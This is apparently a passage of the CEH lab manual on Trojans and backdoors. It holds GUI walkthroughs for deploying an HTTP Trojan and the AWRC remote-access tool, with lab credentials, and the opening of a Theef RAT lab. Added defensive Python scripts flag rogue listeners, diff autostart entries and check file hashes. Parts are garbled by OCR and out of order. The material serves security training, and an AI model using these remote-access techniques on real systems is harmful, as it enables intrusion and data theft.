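def find_rogue_listeners(netstat_text, tasklist_text, expected=EXPECTED_LISTENERS):
    """Return a sorted list of (port, pid, image, reason) for suspicious listeners."""
    pid_to_image = parse_tasklist(tasklist_text)
    findings = []
    for port, pid in parse_listeners(netstat_text):
        image = pid_to_image.get(pid, "<unknown>")
        if port not in expected:
            findings.append((port, pid, image, "listener on port not in allow-list"))
        elif image not in expected[port]:
            findings.append((port, pid, image,
                             "expected one of %s" % sorted(expected[port])))
    return sorted(findings)


if __name__ == "__main__":
    # On a live host, feed in the real outputs of `netstat -ano` and `tasklist /fo csv /nh`.
    for port, pid, image, reason in find_rogue_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print("port %5d  pid %5d  %-16s %s" % (port, pid, image, reason))
```

With the sample input the script reports httpserver.exe on port 80 (the W3SVC port now served by a different image) and mcafee.exe on port 8080 (a port with no expected listener at all).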

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: HTTP Trojan

Information Collected/Objectives Achieved: Successfully sent httpserver.exe to the victim machine. Output: Killed processes: System, smss.exe, csrss.exe, winlogon.exe, services.exe, lsass.exe, svchost.exe, dwm.exe, splwow64.exe, httpserver.exe, firefox.exe

Questions
1. Determine the ports that the HTTP proxy server Trojan uses to communicate.

Internet Connection Required: No
Platform Supported: Classroom, iLabs


Remote Access Trojans Using Atelier Web Remote Commander
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
A backdoor Trojan is a very dangerous infection that compromises the integrity of a computer, its data, and the personal information of its users. Remote attackers use backdoors as a means of accessing and taking control of a computer that bypasses security mechanisms. Trojans and backdoors are types of bad-ware; their main purpose is to send and receive data, and especially commands, through a port to another system. This port can even be a well-known port such as 80, or an out-of-the-norm port like 7777. Trojans are most of the time disguised as legitimate and harmless applications to encourage the user to execute them. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.


Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of this lab include:
■ Gain access to a remote computer
■ Acquire sensitive information of the remote computer

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry out this, you need:
■ Atelier Web Remote Commander located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Atelier Web Remote Commander



■ A computer running Windows Server 2008 (host)
■ Windows Server 2003 running in a virtual machine
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and their appearance may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

Lab Tasks
1. Install and launch Atelier Web Remote Commander (AWRC) in Windows Server 2012.
2. To launch Atelier Web Remote Commander (AWRC), open the Start menu by hovering the mouse cursor over the lower-left corner of the desktop.
[Figure: Windows Server 2012 desktop (Evaluation copy) with the Atelier Web Remote Commander tile on the Start screen]

FIGURE 6.1: Windows Server 2012 Start-Desktop

3. Click AW Remote Commander Professional in the Start menu apps.


[Figure: Windows Server 2012 Start menu apps for Administrator, showing the AW Remote Commander entry under Tools]

FIGURE 6.2: Windows Server 2012 Start Menu Apps

4. The main window of AWRC will appear as shown in the following screenshot.

Note: This tool is used to gain access to all the information of the remote system.

[Figure: AWRC PRO 9.3.9 main window with the menu File / Tools / Help; the tabs SysInfo, NetworkInfo, File System, Users and Groups, Chat and Desktop; the Remote Host, Username and Password fields; Connect and Disconnect buttons; Request authorization and Clear on disconnect options; Progress Report pane; kBps In, kBytes In and Connection Duration counters]

FIGURE 6.3: Atelier Web Remote Commander main window

5. Input the IP address and Username / Password of the remote computer.
6. In this lab we have used Windows Server 2008 (10.0.0.13):
■ User name: Administrator
■ Password: qwerty@123
Note: The IP addresses and credentials might differ in your labs.

7. Click Connect to access the machine remotely.


FIGURE 6.4: Providing remote computer details


8. The following screenshot shows that you are now accessing Windows Server 2008 remotely.
[Figure: AWRC PRO 9.3.9 connected to 10.0.0.13, Desktop tab showing the remote Windows Server 2008 desktop (Internet Explorer, Windows Update, Notepad); Remote Host 10.0.0.13, user administrator; Progress Report: "#16:28:24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13"; Connection Duration: 1 Minute, 42 Seconds; kBytes In: 201.94]

FIGURE 6.5: Remote computer Accessed

9. The Commander is connected to the remote system. Click the SysInfo tab to view complete details of the virtual machine.


FIGURE 6.6: Information of the remote computer

10. Select the NetworkInfo tab, where you can view the network information.
[Figure: AWRC PRO 9.3.9 NetworkInfo tab for 10.0.0.13 listing the shares ADMIN$ (Remark: Remote Admin), C$ (Default share) and IPC$ (Remote IPC) with their Permissions, Max Uses (unlimited), Current Uses, Path and Password columns, plus the Ports, Safeties and IP/Transport Protocols views; Progress Report: "#16:28:24 Initializing, please wait... #16:28:25 Connected to 10.0.0.13"; kBytes In: 250.93; Connection Duration: 5 Minutes, 32 Seconds]

FIGURE 6.7: Information of the remote computer

11. Select the File System tab. Select c:\ from the drop-down list and click Get.
12. This tab lists the complete files of the C:\ drive of Windows Server 2008.


FIGURE 6.8: Information of the remote computer

13. Select Users and Groups, which will display the complete user details.

FIGURE 6.9: Information of the remote computer


FIGURE 6.10: Information of the remote computer

FIGURE 6.11: Information of the remote computer

14. This tool will display all the details of the remote system.
15. Analyze the results of the remote computer.

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Tool/Utility: Atelier Web Remote Commander

Information Collected/Objectives Achieved:
■ Remotely accessing Windows Server 2008
■ Result: System information of remote Windows Server 2008
■ Network Information Path of remote Windows Server 2008
■ Viewing complete files of c:\ of remote Windows Server 2008
■ User and Groups details of remote Windows Server 2008
■ Password hashes

Questions
1. Evaluate the ports that AWRC uses to perform operations.
2. Determine whether it is possible to launch AWRC from the command line and make a connection. If yes, then illustrate how it can be done.

Internet Connection Required
□ Yes  ☑ No
Platform Supported
☑ Classroom


Detecting Trojans
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.

Lab Scenario
Most individuals are confused about the possible ways to remove a Trojan virus from a specific system. One must realize that the World Wide Web is one of the tools that transmits information as well as malicious and harmful viruses. A backdoor Trojan can be extremely harmful if not dealt with appropriately. The main function of this type of virus is to create a backdoor in order to access a specific system. With a backdoor Trojan attack, a concerned user is unaware of the possible effects until sensitive and important information is found missing from a system. With a backdoor Trojan attack, a hacker can also perform other types of malicious attacks as well. The other name for backdoor Trojans is remote access Trojans. The main reason that backdoor Trojans are so dangerous is that they hold the ability to access a particular machine remotely (source: http://www.combofix.org). You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.

Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks. The objectives of the lab include:
■ Analyze using Port Monitor
■ Analyze using Process Monitor
■ Analyze using Registry Monitor
■ Analyze using Startup Program Monitor
■ Create MD5 hash files for Windows directory files

Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors


Lab Environment
To carry out this lab, you need:
■ TCPView, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView
■ Autoruns, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns
■ PrcView, located at C:\CEH-Tools\CEHv7 Module 06 Trojans and Backdoors\Process Monitor Tool\Prc View
■ jv16 PowerTools, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012
■ FsumFrontEnd, located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend
■ A computer running Windows Server 2008 (host)
■ Windows Server 2003 running in a virtual machine
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ You need a web browser to access the Internet
■ Administrative privileges to run tools

Disabling and Deleting Entries: If you don't want an entry to be active the next time you boot or log in, you can either disable or delete it. To disable an entry, uncheck it. Autoruns will store the startup information in a backup location so that it can reactivate the entry when you recheck it. For items stored in startup folders, Autoruns creates a subfolder named Autoruns disabled. Check a disabled item to re-enable it.

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and their appearance may differ from what is shown in the lab, but the actual process of connecting to the server and accessing the processes is the same as shown in this lab.

TASK 1: TCPView

Lab Tasks
1. Go to the Windows Server 2012 virtual machine.
2. Install TCPView from the location D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Port Monitoring Tools\TCPView.
3. The TCPView main window appears, with details such as Process, Process ID, Protocol, Local Address, Local Port, Remote Address, and Remote Port.


Delete items that you do not wish to ever execute by choosing Delete in the Entry menu. Only the currently selected item will be deleted.

FIGURE 8.1: TCPView main window

4. This tool performs port monitoring.

If you are running Autoruns without administrative privileges on Windows Vista and attempt to change the state of a global entry, you'll be denied access.

FIGURE 8.2: TCPView main window

5. Now it is analyzing the SMTP and other ports.


Autoruns will display a dialog with a button that enables you to re-launch Autoruns with administrative rights. You can also use the -e command-line option to launch Autoruns with administrative rights from the start.

There are several ways to get more information about an autorun location or entry. To view a location or entry in Explorer or Regedit, choose Jump To in the Entry menu or double-click on the entry or location's line in the display.

FIGURE 8.3: TCPView analyzing ports

You can also kill a process by double-clicking that process, and then clicking the End Process button in its Properties dialog.

FIGURE 8.4: Killing processes
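Reviewing a TCPView listing by hand scales poorly, so here is an added example (not part of the lab manual and not Sysinternals code) that parses a constructed TCPView-style export, flags listeners that fall outside an assumed allowlist of expected (process, protocol, port) triples, and reports listeners that were absent from an earlier snapshot of the same host.

```python
"""Listening-port review over a TCPView-style listing.

Added example for this lab; it is not part of the CEH manual and not
Sysinternals code. It assumes a whitespace-separated export whose columns
follow the TCPView display order (Process, PID, Protocol, Local Address,
Local Port, Remote Address, Remote Port, State). All rows below are
constructed for illustration; the allowlist is an assumed site policy.
"""
from dataclasses import dataclass
from typing import List, Set, Tuple

# Constructed sample listing (not a real capture). UDP rows have no State column.
SAMPLE_LISTING = """\
Process      PID   Protocol  Local Address  Local Port    Remote Address  Remote Port  State
dns.exe      1572  TCP       WIN-2N9STOSGL  domain        WIN-2N9STOSGL   0            LISTENING
dns.exe      1572  UDP       WIN-2N9STOSGL  domain        *               *
svchost.exe  960   TCP       WIN-2N9STOSGL  5985          WIN-2N9STOSGL   0            LISTENING
System       4     TCP       WIN-2N9STOSGL  microsoft-ds  WIN-2N9STOSGL   0            LISTENING
System       4     TCP       WIN-2N9STOSGL  microsoft-ds  windows8        49481        ESTABLISHED
svchost.exe  3092  TCP       WIN-2N9STOSGL  5504          WIN-2N9STOSGL   0            LISTENING
hostsvc.exe  4412  TCP       WIN-2N9STOSGL  6666          WIN-2N9STOSGL   0            LISTENING
"""

# Constructed earlier snapshot of the same host, used as the baseline.
SAMPLE_BASELINE = """\
dns.exe      1572  TCP       WIN-2N9STOSGL  domain        WIN-2N9STOSGL   0            LISTENING
dns.exe      1572  UDP       WIN-2N9STOSGL  domain        *               *
svchost.exe  960   TCP       WIN-2N9STOSGL  5985          WIN-2N9STOSGL   0            LISTENING
System       4     TCP       WIN-2N9STOSGL  microsoft-ds  WIN-2N9STOSGL   0            LISTENING
svchost.exe  3092  TCP       WIN-2N9STOSGL  5504          WIN-2N9STOSGL   0            LISTENING
"""

# Assumed site policy: (process, protocol, local port) triples expected to listen.
SAMPLE_ALLOWLIST: Set[Tuple[str, str, str]] = {
    ("dns.exe", "TCP", "domain"),
    ("dns.exe", "UDP", "domain"),
    ("svchost.exe", "TCP", "5985"),      # WinRM over HTTP
    ("system", "TCP", "microsoft-ds"),   # SMB
}


@dataclass(frozen=True)
class Endpoint:
    process: str
    pid: int
    protocol: str
    local_port: str   # TCPView shows a service name (domain, http) or a number
    state: str        # LISTENING / ESTABLISHED / "" for UDP

    @property
    def key(self) -> Tuple[str, str, str]:
        """Identity used for the allowlist and the baseline: who listens where."""
        return (self.process.lower(), self.protocol.upper(), self.local_port.lower())

    def is_listener(self) -> bool:
        # A bound UDP socket accepts unsolicited input just like a TCP listener.
        return self.protocol.upper() == "UDP" or self.state.upper() == "LISTENING"


def parse_listing(text: str) -> List[Endpoint]:
    """Parse TCPView-style rows; the header line and blank lines are skipped."""
    endpoints: List[Endpoint] = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7 or not fields[1].isdigit():
            continue
        state = fields[7] if len(fields) > 7 else ""
        endpoints.append(Endpoint(fields[0], int(fields[1]), fields[2], fields[4], state))
    return endpoints


def find_unexpected(endpoints: List[Endpoint],
                    allowlist: Set[Tuple[str, str, str]]) -> List[Endpoint]:
    """Listeners whose (process, protocol, port) is not covered by the allowlist."""
    return [ep for ep in endpoints if ep.is_listener() and ep.key not in allowlist]


def new_listeners(baseline_text: str, current_text: str) -> List[Endpoint]:
    """Listeners present now that were absent from the baseline snapshot."""
    known = {ep.key for ep in parse_listing(baseline_text) if ep.is_listener()}
    return [ep for ep in parse_listing(current_text)
            if ep.is_listener() and ep.key not in known]


if __name__ == "__main__":
    current = parse_listing(SAMPLE_LISTING)
    for ep in find_unexpected(current, SAMPLE_ALLOWLIST):
        print(f"not in allowlist:   {ep.process} (PID {ep.pid}) {ep.protocol}/{ep.local_port}")
    for ep in new_listeners(SAMPLE_BASELINE, SAMPLE_LISTING):
        print(f"new since baseline: {ep.process} (PID {ep.pid}) {ep.protocol}/{ep.local_port}")
```

A flagged entry is a lead, not a verdict: the next step is the Properties dialog shown in Figure 8.4 to confirm the image path and publisher of the listening process.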

TASK 2: Autoruns

Go to the Windows Server 2012 virtual machine. Double-click Autoruns.exe, which is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Process Monitoring Tools\Autoruns. It lists all processes, DLLs, and services.


You can view Explorer's file properties dialog for an entry's image file by choosing Properties in the Entry menu. You can also have Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.

FIGURE 8.5: Autoruns main window

Simply run Autoruns and it shows you the currently configured autostart applications in the locations that most directly execute applications. Perform a new scan that reflects changes to options by refreshing the display.

Internet Explorer: This entry shows Browser Helper Objects (BHOs), Internet Explorer toolbars and extensions.

10. The following is the detailed list on the Logon tab.
FIGURE 8.9: Autoruns Logon list

11. The following are the Explorer list details.


Services: All Windows services configured to start automatically when the system boots.

FIGURE 8.10: Autoruns Explorer list

12. The following are the Services list details.

Drivers: This displays all kernel-mode drivers registered on the system except those that are disabled.

FIGURE 8.11: Autoruns Services list

13. The following are the Drivers list details.


Scheduled Tasks: Task Scheduler tasks configured to start at boot or logon.

FIGURE 8.12: Autoruns Drivers list

14. The following is the KnownDLLs list in Autoruns.

FIGURE 8.13: Autoruns KnownDLLs list
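Autoruns' File | Compare highlights entries that are new since a saved scan, and the lab's last objective is to keep MD5 hash files of directory contents. This added example (not the lab's, Sysinternals' or Fsum Frontend's code) combines the two ideas: it snapshots autostart entries the way Autoruns lists them (location, entry name, image path) together with a digest of each image file, so a later snapshot reveals new and removed entries as well as entries whose binary was swapped. The entries and files are constructed in a temporary directory; the Run key is the real one shown on the Logon tab.

```python
"""Autostart baseline with image-file hashes.

Added example for this lab; not part of the CEH manual and not Sysinternals
or Fsum Frontend code. MD5 is supported because the lab's checker writes MD5
files, but SHA-256 is the default: MD5 collisions are practical, so an MD5
match alone should not be trusted as proof that a binary is unchanged.
"""
import hashlib
import os
import tempfile
from typing import Dict, Iterable, List, Optional, Tuple

# Real Run key that Autoruns shows on its Logon tab (see the lab screenshots).
RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

Entry = Tuple[str, str, str]                        # (location, entry name, image path)
EntryKey = Tuple[str, str]                          # (location, entry name), case-folded
Snapshot = Dict[EntryKey, Tuple[str, Optional[str]]]  # key -> (image path, digest or None)


def hash_bytes(data: bytes, algorithm: str = "sha256") -> str:
    return hashlib.new(algorithm, data).hexdigest()


def hash_file(path: str, algorithm: str = "sha256") -> str:
    """Stream the file so large images do not have to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(entries: Iterable[Entry], algorithm: str = "sha256") -> Snapshot:
    """Map each entry to (image path, digest); digest is None when the file is missing."""
    snap: Snapshot = {}
    for location, name, image in entries:
        # Autoruns shows "File not found" for such rows; keep them, because a
        # dangling entry can later be satisfied by a dropped binary.
        digest = hash_file(image, algorithm) if os.path.isfile(image) else None
        snap[(location.lower(), name.lower())] = (image, digest)
    return snap


def compare(baseline: Snapshot, current: Snapshot) -> Dict[str, List[EntryKey]]:
    """Report new, removed and modified entries between two snapshots.

    Unlike Autoruns' own Compare, removed entries are reported too.
    """
    report: Dict[str, List[EntryKey]] = {"new": [], "removed": [], "modified": []}
    for key, value in sorted(current.items()):
        if key not in baseline:
            report["new"].append(key)
        elif baseline[key] != value:      # image path changed or its digest changed
            report["modified"].append(key)
    for key in sorted(baseline):
        if key not in current:
            report["removed"].append(key)
    return report


def demo() -> Dict[str, List[EntryKey]]:
    """Build a baseline, simulate changes, and diff. Files and entries are constructed."""
    with tempfile.TemporaryDirectory() as d:
        hkcmd = os.path.join(d, "hkcmd.exe")
        igfx = os.path.join(d, "igfxtray.exe")
        with open(hkcmd, "wb") as f:
            f.write(b"constructed image A")
        with open(igfx, "wb") as f:
            f.write(b"constructed image B")
        baseline_entries = [(RUN_KEY, "HotKeysCmds", hkcmd), (RUN_KEY, "IgfxTray", igfx)]
        baseline = snapshot(baseline_entries)

        # Simulated changes: one image replaced in place, plus a new Run entry
        # pointing at a binary that does not exist (yet).
        with open(igfx, "wb") as f:
            f.write(b"constructed image B, replaced")
        current_entries = baseline_entries + [(RUN_KEY, "Updater", os.path.join(d, "upd.exe"))]
        current = snapshot(current_entries)
        return compare(baseline, current)


if __name__ == "__main__":
    for kind, keys in demo().items():
        for location, name in keys:
            print(f"{kind:8s} {location}\\{name}")
```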

TASK 4: jv16 PowerTools

15. Install and launch jv16 PowerTools in Windows Server 2012 (host machine).
16. jv16 PowerTools is located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Registry Monitoring Tools\jv16 Power Tools 2012.
17. To launch jv16 PowerTools, select the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.


FIGURE 7.1: Windows Server 2012 Start-Desktop

18. Click jv16 PowerTools 2012 in the Start menu apps.

Winlogon Notifications: Shows DLLs that register for Winlogon notification of logon events.

FIGURE 7.2: Windows Server 2012 Start Menu Apps

19. Click the Clean and fix my computer icon.

Winsock Providers: Shows registered Winsock protocols, including Winsock service providers. Malware often installs itself as a Winsock service provider because there are few tools that can remove them. Autoruns can uninstall them, but cannot disable them.


FIGURE 8.20: jv16 Home page

20. The Clean and fix my computer dialog box appears. Click the Settings tab and then click the Start button.

LSA Providers: Shows registered Local Security Authority (LSA) authentication, notification and security packages.

FIGURE 8.21: jv16 Clean and fix my computer dialog

21. It will analyze your system for files; this will take a few minutes.

Print Monitor Drivers: Displays DLLs that load into the print spooling service. Malware has used this support to autostart itself.

FIGURE 8.22: jv16 Clean and fix my computer analyzing

22. Computer items will be listed after the complete analysis.

You can save the results of a scan with File->Save and load a saved scan with File->Load. These commands work with native Autoruns file formats, but you can use File->Export to save a text-only version of the scan results. You can also automate the generation of native Autoruns export files with command-line options.

FIGURE 8.24: jv16 Clean and fix my computer item details

23. Selected item details are as follows.

Sidebar: Displays Windows sidebar gadgets.

Compare the current Autoruns display with previous results that you've saved. Select File | Compare and browse to the saved file. Autoruns will display in green any new items, which correspond to entries that are not present in the saved file. Note that it does not show deleted items.

FIGURE 8.23: jv16 Clean and fix my computer items

24. The Registry junk section provides details for selected items.

FIGURE 8.25: jv16 Clean and fix my computer item registry junk

25. Select all check boxes 111 die item list and click Delete. A dialog box appears. Click Yes.

— L&S f c s l i l f i f l Page Empty Locations selection in die Options menu is checked Autoruns doesn't show locations with no entries

CEH Lab Manual Page 479
Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

[Dialog shown by jv16 PowerTools: "You are about to delete a lot of erroneous registry data. Using the Fix option is always the better option. Are you sure you know what you are doing and want to proceed?"]

FIGURE 8.26: jv16 Clean and fix my computer! item check box.

26. Go to the Home tab, and click the Control which programs start automatically icon.


The Verify Signatures option appears in the Options menu on systems that support image signing verification; it can result in Autoruns querying certificate revocation list (CRL) web sites to determine whether image signatures are valid.


FIGURE 8.28: jv16 Control which programs start automatically.

27. Check the programs listed in Startup Manager, and then select the appropriate action for each.

The Hide Microsoft Entries selection omits images that have been signed by Microsoft if Verify Signatures is selected, and omits images that have Microsoft in their resource's company name field if Verify Signatures is not selected.


FIGURE 8.29: jv16 Startup Manager dialog.

28. Click the Registry Tools menu to view the registry tool icons.


Use the Hide Microsoft Entries or Hide Windows Entries option in the Options menu to help you identify software that has been added to a system since installation. Autoruns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for the file that is trusted by the system.


FIGURE 8.30: jv16 Registry tools.

29. Click File Tools to view the file tool icons.

Hide Windows Entries omits images signed by Windows if Verify Signatures is selected. If Verify Signatures is not selected, Hide Windows Entries omits images that have Microsoft in their resource's company name field and that reside beneath the %SystemRoot% directory.

FIGURE 8.31: jv16 File tools.

30. Click System Tools to view the system tool icons.

FIGURE 8.32: jv16 System tools.


31. Click Privacy Tools to view the privacy tool icons.

FIGURE 8.33: jv16 Privacy tools.

32. Click Backups in the menu to display the Backup Tool dialog box.

FIGURE 8.34: jv16 Backup Tool.


33. Go to Windows Server 2012 Virtual Machine.
TASK 5

FsumFrontEnd

34. Double-click FsumFrontEnd.exe, the executable file located at D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend.
35. The Fsum Frontend main window is shown in the following screenshot.

CEH-Tools are also located on the mapped network drive (Z:) of the virtual machines.

FIGURE 8.35: FsumFrontEnd main window.

36. Select the type of hash that you want, for example MD5: check the md5 check box.

FIGURE 8.36: FsumFrontEnd checking md5.

37. Select a file by clicking the File browse button and choosing a file from the desktop; in this lab it is Test.txt.

Have Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.


FIGURE 8.37: FsumFrontEnd file browse.

Autoruns displays the text "(Not verified)" next to the company name of an image that either does not have a signature or has a signature that is not signed by a certificate root authority on the list of root authorities trusted by the system.


FIGURE 8.38: FsumFrontEnd file open.

38. Click Add Folder to select a folder to be added to the hash, for example D:\CEH-Tools.


FIGURE 8.39: FsumFrontEnd Add Folder.

A "Hide Signed Microsoft Entries" option helps you to zoom in on third-party auto-starting images that have been added to your system.


FIGURE 8.40: FsumFrontEnd Adding Folder.

39. The files of the selected folder are listed in a list box.


FIGURE 8.41: FsumFrontEnd files list.

40. Click Generate checksum files. The progress bar shows the percentage complete for the hash files being generated.

FIGURE 8.42: FsumFrontEnd Generate checksum files.


You can also use the -e command-line option to initially launch Autoruns with administrative rights.

FIGURE 8.43: FsumFrontEnd progress of hash files.

41. The following is the list of MD5 hash files after completion.


FIGURE 8.44: FsumFrontEnd list of hash files.
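The procedure above (steps 34 to 41) scripted, as an added example that is not part of the lab manual or of the Fsum Frontend tool: it hashes every file under a folder, writes a checksum manifest, and later verifies the folder against it, reporting modified, added and removed files. The folder, file names and tampering are constructed for the demonstration; SHA-256 is the default in place of the MD5 the lab selects, with MD5 shown only for the empty Test.txt.

```python
"""Added example, not part of the lab manual or of the Fsum Frontend tool.
Automates what the lab does by hand with FsumFrontEnd: hash every file under a
folder, write a manifest of "<hexdigest>  <relative path>" lines (the layout
md5sum/sha256sum -c read), and later verify the folder against it."""
import hashlib
import hmac
import os
import tempfile
from pathlib import Path

# The lab selects MD5. MD5 still catches accidental corruption, but collisions
# are practical, so SHA-256 is the default here for a tamper-evident baseline.
DEFAULT_ALGORITHM = "sha256"
CHUNK_SIZE = 64 * 1024


def hash_file(path, algorithm=DEFAULT_ALGORITHM, key=None):
    """Base16 (hexadecimal) digest of a file, read in chunks. With a key an HMAC
    is computed instead (FsumFrontEnd's HMAC option): someone who can alter
    files but lacks the key cannot forge a matching manifest entry."""
    h = hmac.new(key, digestmod=algorithm) if key else hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK_SIZE), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root, algorithm=DEFAULT_ALGORITHM, key=None):
    """Map each file's path (relative to root, POSIX separators) to its digest."""
    root = Path(root)
    manifest = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = Path(dirpath) / name
            manifest[full.relative_to(root).as_posix()] = hash_file(full, algorithm, key)
    return manifest


def write_manifest(manifest, out_path):
    """Write sorted "<digest>  <path>" lines (two spaces, as md5sum does)."""
    with open(out_path, "w", encoding="utf-8") as f:
        for rel in sorted(manifest):
            f.write(f"{manifest[rel]}  {rel}\n")


def read_manifest(path):
    """Parse a manifest written by write_manifest; blank lines are ignored."""
    manifest = {}
    with open(path, encoding="utf-8") as f:
        for line in f:
            line = line.rstrip("\n")
            if line:
                digest, _, rel = line.partition("  ")
                manifest[rel] = digest.lower()
    return manifest


def verify_tree(root, manifest, algorithm=DEFAULT_ALGORITHM, key=None):
    """Compare the folder's current state with a saved manifest. Removed files
    are reported too: a deleted component is as much an event as a patched one."""
    current = build_manifest(root, algorithm, key)
    return {
        "modified": sorted(p for p in manifest if p in current and current[p] != manifest[p]),
        "added": sorted(set(current) - set(manifest)),
        "removed": sorted(set(manifest) - set(current)),
    }


def demo():
    """Constructed scenario: baseline a folder, tamper with it, then verify.
    Returns (report, MD5 of a 0-byte Test.txt, the file the lab hashes)."""
    with tempfile.TemporaryDirectory() as tmp:
        tree = Path(tmp) / "CEH-Tools"                 # constructed stand-in folder
        (tree / "Fsum Frontend").mkdir(parents=True)
        readme = tree / "Fsum Frontend" / "readme.txt"
        helper = tree / "Fsum Frontend" / "helper.exe"
        readme.write_text("original readme\n")
        helper.write_bytes(b"MZ\x90\x00" + b"A" * 64)  # constructed fake PE stub
        test_txt = Path(tmp) / "Test.txt"
        test_txt.write_bytes(b"")

        manifest_file = Path(tmp) / "baseline.sha256"  # kept outside the tree
        write_manifest(build_manifest(tree), manifest_file)

        # Simulated tampering: patch the binary, drop a new DLL, delete a file.
        helper.write_bytes(b"MZ\x90\x00" + b"B" * 64)
        (tree / "Fsum Frontend" / "dropped.dll").write_bytes(b"junk")
        readme.unlink()

        report = verify_tree(tree, read_manifest(manifest_file))
        return report, hash_file(test_txt, "md5")


if __name__ == "__main__":
    result, empty_md5 = demo()
    for kind, paths in result.items():
        print(f"{kind}: {paths}")
    print("md5(Test.txt) =", empty_md5)
```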

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Scenario: Alice wants to use TCPView to keep an eye on external connections. However, sometimes there are large numbers of connections with a Remote Address of "localhost:####". These entries do not tell Alice anything of interest, and the large quantity of entries caused useful entries to be pushed out of view.
2. Is there any way to filter out the "localhost:####" Remote Address entries?
3. Evaluate what other details are displayed by "autoruns" and analyze the working of the autoruns tool.
4. Evaluate the other options of jv16 PowerTools and analyze the result.
5. Evaluate and list the algorithms that FsumFrontEnd supports.

Internet Connection Required: ☐ Yes ☑ No

Platform Supported: ☑ Classroom ☑ iLabs


Creating a Server Using the Theef
Theef is a Windows-based application for both the client and server end. The Theef server is a virus that you install on your victim's computer, and the Theef client is what you then use to control the virus.

Lab Scenario
A backdoor Trojan provides remote, usually surreptitious, access to affected systems. A backdoor Trojan may be used to conduct distributed denial-of-service (DDoS) attacks, or it may be used to install additional Trojans or other forms of malicious software. For example, a backdoor Trojan may be used to install a downloader or dropper Trojan, which may in turn install a proxy Trojan used to relay spam, or a keylogger Trojan, which monitors and sends keystrokes to remote attackers. A backdoor Trojan may also open ports on the affected system and thus potentially lead to further compromise by other attackers. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.


Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected

Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors

Lab Environment
To carry this out, you need:
■ Theef tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef

■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 Virtual Machine (Attacker)
■ Windows Server 2008 running in Virtual Machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 20 Minutes

Overview of Trojans and Backdoors
